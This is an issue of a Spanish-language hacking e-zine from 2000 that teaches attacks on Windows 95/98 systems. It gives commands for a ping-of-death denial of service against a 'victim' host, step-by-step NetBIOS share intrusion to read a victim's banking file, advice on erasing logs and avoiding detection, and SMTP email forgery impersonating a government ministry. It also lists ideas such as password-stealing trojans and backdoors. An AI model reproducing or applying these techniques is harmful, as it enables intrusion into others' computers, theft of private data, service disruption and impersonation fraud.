|
||||||||
·
Sugerencias para un buen hacking ·
Recurso Compartidos (hacking) ·
Créditos Si tienes algún
buen tip, truco reportaje, que quieres que lo incluyamos en los futuros tirajes o
problemas para recibir esta edición mándalos a: Solo que agradecemos
a muchas personas que se han encargado de retransmitir estas ediciones
solo que han puesto de su cosecha cambiando los créditos y los banners
es por que rogamos si tu recibes esta edición, recuerdas que pertenece
a etimegt un nombre registrado por technodata , bueno ya basta de
regaños y pasemos a la edición.
Como
todos sabemos la seguridad en win95/98 es nula, es decir, win95/98
no tiene seguridad por si mismo, un claro ejemplo
de esto que es las ventanas que
nos piden un password las podemos cerrar pulsando sobre la X o también
nos basta con pulsar ctrl+atl+supr, con lo que nos saltaremos
esta ventana sin meter ningun password. Por eso para que nuestro ventanas
(nombre que se le da a win95/98
tendremos que instalarle algún paquete de seguridad disponible
por la red, que hay muchos y buenos y lo mejor es que son Freeware
(gratis) aunque siempre puedes comprar alg Ataques
Típicos a Nuestro Windows. Lógicamente
seremos muy propensos a ataques tipo DoS (denial of service), como son el LAND, BONK, TEARDROP y por supuesto
los famosos nukes, OOB, etc...
Para estar protegidos lo que tenemos que hacer es pasarnos
por los web's de seguridad
o el de la casa Microsoft en los cuales se cuelgan
los parches de estos ataques. No siempre funcionan pero nos
ahorraran muchos disgustos
en muchos casos. La gente suele ser muy propensa a estas cosas porque
no esta informada sobre estos ataques y por consiguiente
no se instala los parches correspondientes. Protegiendo Nuestras Acciones. Esta sección esta enfocada a esconder nuestros actos hacking por Internet.
Ya que todo lo que hagamos dejaremos huellas y por desgracia la gente
no se entera de esto y deja muchas pistas. Borrando Nuestras Huellas. Cuando conectamos a un servidor, este graba lo que hacemos (cuando hemos
conectado, como, desde donde y varias cosas mas), por eso hay que
tener mucho cuidado. La mayoría de servidores
que hackeemos por Internet serán unix, conviene tener a mano "zappers", son programas
que borran nuestras huellas en el
servidor. Existen muchos programas para este propósito que
funcionan bajo Unix. Solo los tenemos que compilar en el servidor
y ejecutarlos. Por desgracia
al usar Win95/98 no podemos compilarlos en nuestro ordenador y subirlo
por FTP pero algo es algo.
Aquí hablare sobre algunas ideas que pueden potenciar el hacking en
Win95/98 y la creación de nuevas herramientas. - Programas troyanos que capturen el password del acceso a Internet. - Programas para IP-Spoof. - Creación de herramientas de redes para Win95/98. - Wardialers. - Programas para atacar otros Win95/98 (DoS). - Nuevas Suites. - Programas crackeadores del passwd. - Programas criptograficos. - Programas eliminadores de ficheros de forma segura. - Puertas traseras. (backdorrs) - Programas de administracion remota. - Programas DoS para saltarse protecciones. - Programas que realmente proporcionen
seguridad a nuestro sistema.
Esta técnica no es propia de un Hacker sino de un Lamer (no quiero decir
Cracker para no ofender a nadie :) ya que únicamente sirve
para tirar un servidor o sea que se desconecta de Internet y esto
puede representar grandes perdidas a una empresa. Con esto solo les
quiero decir que aunque aquí les explicare no es cuestión que lo uses
por Internet atacando servidores. La utilidad Ping sirve principalmente para saber si un servidor esta
activo y además podemos calcular el trafico en la red según el tiempo
de su respuesta. Básicamente
se le envía un paquete a un servidor y este nos contesta, solo que
si se le envía un paquete muy grande puede llegar desordenado, por
lo que el servidor pide al origen que le vuelva a enviar una parte
o la totalidad del paquete, por lo que se produce un datagrama del
ping muy grande y producirá su caída. Para ejecutar este ataque solo
tenemos que escribir : c:\>ping
-l 65510 victima.com Pues esta simple línea es
muy destructiva, por lo que tened cuidado y antes de hacer tonterías
lee la parte sobre seguridad y como borrar sus huellas.
Como
win95/98 NO tiene seguridad nos permite colarnos en el disco duro
de otra
persona por Internet y lo mejor del caso es que esta técnica nos la
proporciona los propios programas del win95/98. Por supuesto no todo
es tan sencillo
ya que hay que cumplir unos requisitos. Esto se debe a una mala configuración
del propio usuario al no configurar adecuadamente los recursos compartidos
de su red corriendo sobre win95/98. Para
colarnos en el HD de otro ordenador debemos tener nuestro ordenador
bien configurado, o sea el compartir recursos bien puesto y también
tener el Netbios instalado. Para configurarlo, tenemos que tener activado
la opción de "compartir ficheros e impresoras" en MIPC->Panel
de Control->Red. SI por
el caso la opción esta desactivada simplemente pulsamos el botón de "a MIPC->Acceso
Telefónico a Redes->Conexión a Inet que usaremos->boton derecho->
propiedades, debiendo estar activada la casilla "conectarse
a la red". Ahora
ya podemos ponernos manos a la obra, entonces volvemos a una ventana
del MS-DOS y ejecutamos: c:\>nbtstat
-A (IP DE LA VICTIMA) NetBIOS
Remote Machine Name Table Name Type Status --------------------------------------------- VICTIMAMACHINE <00> UNIQUE Registered VICTIMAGROUP <00> GROUP Registered VICTIMAMACHINE <03> UNIQUE Registered VICTIMAMACHINE <20> UNIQUE Registered VICTIMAGROUP <1E> GROUP Registered MAC
Address = 44-45-53-54-00-00 Cuando
ejecutamos este comando nos saldrá una tabla como esta y el primer
'UNIQUE' de tipo <00> es el nombre de la victima y como puedes
ver la maquina se llama VICTIMAMACHINE. Entonces
ahora creamos / editamos el archivo LMHOSTS, si por el caso encontraras uno que pone LMHOSTS.SAM no lo
toques, poniendo la dirección IP y
el nombre de la maquina en cuestión, esto seria de la siguiente forma: c:\>edit
c:\windows\system32\LMHOSTS VICTIMAMACHINE Entonces
cerramos el fichero y desde un ventana del MS-DOS ejecutamos un comando
para añadir el ordenador de la victima a nuestro Netbios y esto
seria de la siguiente forma: c:\>NBTSTAT
-R Ahora
nos interesa saber que recursos comparte la victima y esto tampoco nos
traerá complicación alguna: c:\>net
view \\VICTIMAMACHINE Shared
resources at \\VICTIMAMACHINE Sharename Type Comment ----------------------------------------- BANCO Disk Y
como podemos observar comparte una carpeta llamada BANCO. Ahora
ya podemos operar como si fuese una terminal mas en nuestra red local sobre
win95/98. Ya solo nos queda ejecutar el comando que queramos, si por ejemplo
queremos ver el contenido, solo tenemos que escribir: c:\>
dir \\VICTIMAMACHINE\BANCO O
para leer cualquier fichero de la carpeta: c:\>
type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT Si
queremos conectar al recurso compartido de forma grafica (o sea con una
ventana y no seguir usando el MS-DOS), solo tenemos que pulsar INICIO->BUSCAR
PC y detendremos el PC remoto pero esto solo es posible si
hemos añadido la VICTIMAMACHINE a una unidad de red a la que podamos llamar,
deberemos ejecutar: c:\>NET
USE e: \\MIPC\WINDOWS Esta
técnica solo funciona si la maquina remota ejecuta win95/98 o win
3.11 y además comparte las carpetas sin contraseña
en modo "Acceso a nivel compartido"
MIPC->Panel de control->Red | Control de acceso. Si utilizase
el "Acceso a nivel de usuario" nuestro grupo debe
estar autorizado en esa maquina. Podemos probar a intentar insertar
el grupo de nuestra maquina para
que este autorizada, esto lo conseguiremos con el Regedit, por
desgracia los sistemas win95/98 y OSR2 que están ejecutando
el Servidor Web Personal de Microsoft desactivan esta posibilidad
de acceso remoto tras informar
de la conveniencia de hacerlo al usuario, ya que el servidor web
obliga a compartir carpetas aun sin tener red local. Logicamente
un usuario que haya tenido el despiste de conectarse a Internet con
carpetas compartidas no toma luego medidas de control sobre quien
entra en su maquina. Pero no hay que hacer ilusiones ya que podemos
ser pillados si por ejemplo un usuario ejecuta el programa Netwatch,
que muestra los usuarios conectados
a nuestra computadora en cada momento y por supuesto el nombre de
las computadoras por lo que es aconsejable cambiar el nombre de nuestra
computadora usando el Regedit. Si nuestra maquina se llama HACKERNOBO cambiamos todas la cadenas
donde aparezca este nombre con el Regedit a un nombre menos sospechoso. Si
no conectamos la VICTIMAMACHINE como una unidad mas a nuestra computadora no nos tendremos que preocupar
del Netwatch, así conseguiremos una
cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE
no se dará
cuenta de nuestra entrada. También hay que decir que si la VICTIMAMACHINE
quiere apagar su computadora le saldrá el mensaje del tipo "hay
otros usuarios conectados a su ordenador, si apaga se desconectaran" si
ocurre esto seremos pillados. Decir
que el comando Net, dispone de muchos parámetros que nos puede ser útiles
y además podemos jugar durante mucho tiempo con ellos :) los cuales son
los siguientes: c:\>net
/? For
more information about a specific Microsoft NET command,
type the command name followed by /? (for
example, NET VIEW /?). NET
CONFIG Displays your current
workgroup settings. NET
DIAG Runs the Microsoft
Network Diagnostics program to display diagnostic information
about your network. NET
HELP Provides information
about commands and error messages. NET
INIT Loads protocol
and network-adapter drivers without binding them to Protocol
Manager. NET
LOGOFF Breaks the connection
between your computer and the shared resources
to which it is connected. NET
LOGON Identifies you as
a member of a workgroup. NET
PASSWORD Changes your logon password. NET
PRINT Displays information
about print queues and controls print jobs. NET
START Starts services. NET
STOP Stops services. NET
TIME Displays the time
on or synchronizes your computer's clock with the clock on a
Microsoft Windows for Workgroups, Windows NT, Windows
95, or NetWare time server. NET
USE Connects to or disconnects
from a shared resource or displays information
about connections. NET
VER Displays the type
and version number of the workgroup redirector you are
using. NET
VIEW Displays a list of
computers that share resources or a list of shared
resources on a specific computer. The command was completed successfully. Pues aquí tienes
todos los parámetros disponibles del comando Net, por lo que solo
nos queda jugar un rato para saber que es cada cosa. No es divertido si lo explico todo.
Esta técnica nos ayuda a suplantar la dirección
de correo electrónica que Queramos J. La verdad es que tiene pocos usos, en mi opinión
debido a una serie de razones pero siempre puede servir
para gastar una buena broma enviando aun amigo un mail del director
de la Universidad diciendo que
ha sido expulsado por pirata }:-) y no te cuento si es un mail de
la Nacional Civil. (bueno que esos burros ni escribir saben) La verdad es que es muy sencillo de hacer pero
por supuesto habrá que tomar unas ciertas medidas de seguridad, que
ya explique. Lo primero que tenemos que hacer es ejecutar el cliente
Telnet (sobre el manejo del Telnet y donde pone "puerto" en vez
de poner el puerto 23 pondremos
el 25 que corresponde al puerto del mail y esperamos a que nos conectemos a ese puerto, cuando conectemos nos saldrá
un mensaje y esta esperando
a que pulsemos alguna tecla: 220 Howdy From mail.airmail.net running Smail
3.1.30.16 (ESMTP) [d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500
(CDT) Muchas veces lo que podemos hacer es escribir
"help" y saldrán todos los
comandos, también podemos escribir "echo" y la maquina
nos contestara que esta lista. Para escribir un mail hay que seguir
una serie de pasos: mail from:webmaster@ministeriopublico.gov.gt
<- ponemos de donde viene. El servidor nos contesta: 250 < webmaster@ministeriopublico.gov.gt >
... Sender Okay Ahora escribimos: rcpt to:nob_ody@xxxxxxxx.com <- a quien se
lo enviamos. El servidor nos contesta: 250 <nob_ody@xxxxxxxx.com> ... Recipiant
Okay Ahora escribimos: data El servidor nos contesta: 354 Enter mail, end with "." on a line
by itself Ahora escribimos: To: nob_ody@xxxxxxxx.com
From: gc.uco@mad.servicom.es Subject: Te querremos!! Bueno
nobody, solo te queremos decir que nos gusta tu trabajo y te querremos fichar para el departamento. Direccion General de Ministerio publico .
<- para terminar el mail. El servidor
nos contesta: 250 Mail
accepted Ahora
escribimos: quit <- ya esta todo
listo J Pues ves como es realmente simple!! Pero antes
de empezar a jugar con esta
tecnica tenemos que asegurarnos que el servidor de mail no registra nuestro IP, esto lo podremos averiguar si
enviamos un mail de prueba a alguna cuenta anónima que tengamos. Si
vemos que en la cabecera del mail sale nuestro IP ese servidor no
sirve. Hay listas disponibles por Internet sobre servidores que permiten
hacer esto.
Webmaster
: T3ChNoDAt-@ Editores: T3ChNoDAt-@ T3ChNoDat-@ S.A. Guatemala Abril del 2000 |
Ahora obtén
los anteriores números en Si estas interesado en que aparezca tu pagina, negocio o tan solo
un banner de cualquier cosa en esta publicación, escribe a etimegt@intelnet.net.gt ¡Estamos en busca de reporteros! Si te interesa participar en tu tiempo libre en nuestra revista
pues apuntate en La pagina
recomendada |
|||||||